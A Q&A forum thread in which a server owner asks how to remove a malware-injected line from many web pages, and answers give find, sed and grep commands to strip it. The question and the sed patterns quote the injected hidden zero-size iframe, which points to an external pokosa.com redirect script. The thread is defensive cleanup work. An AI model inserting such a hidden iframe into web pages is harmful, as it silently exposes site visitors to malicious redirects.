# I need to remove a line from multiple files

Tags: linux, grep, replace

A malware has attacked my server and added the line

```
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
```

to many of my pages

how can i remove it with grep or if there is any other way i can remove it from all the files it affected

Edit: I saw the comments about using sed, but I need a recursive solution, if there is one

thanks

Comment: Take a look at: http://stackoverflow.com/questions/1182756/remove-line-of-text-from-multiple-files-in-linux

Comment: I think you should also care about understanding how that malware happened to be able to penetrate your system, to avoid having another attack...

Answer (score 5, accepted):

You can use `find` and `sed` to recursively find all files of interest and remove the offending line from them.

For example, the following command would remove the offending line from all `.html` files from the current directory and all its sub-directories.

```
find . -name "*.html" -exec sed -i 's/<iframe src="http:\/\/pokosa.com\/tds\/go.php?sid=1" width="0" height="0" frameborder="0"><\/iframe>//' {} \;
```

Answer (score 3):

You can use `sed` to do replacement in files. Something like

```
$ sed -i.bak 's|<iframe src="http://pokosa.com.*</iframe>||' your-file
```

should do it for a single file. People traditionally use `/` as the separator, but that becomes cumbersome when you have many `/`s in your search string. Using `|` is easier then.

Combine `sed` with `find` and `xargs` to do the same for multiple files:

```
$ find /var/www -name "*.html" -print0 | xargs -0 sed -i.bak 's|<iframe ...>||'
```

Answer (score 2):

The simplest approach would probably be with an inverted `grep`:

```
$ grep -v pokosa < input > output
```

You might want to make the output the same as the input with some extra suffix, then run some diff:s to verify that it's doing the right thing, before renaming over the input files.

Comment: Interesting idea — works fine if each match is on a line by itself. An additional hint is that `input` and `output` *must* be different: with `grep -v < a.html > a.html` you end up truncating `a.html` before anything is read! Just a small thing to be careful with :-)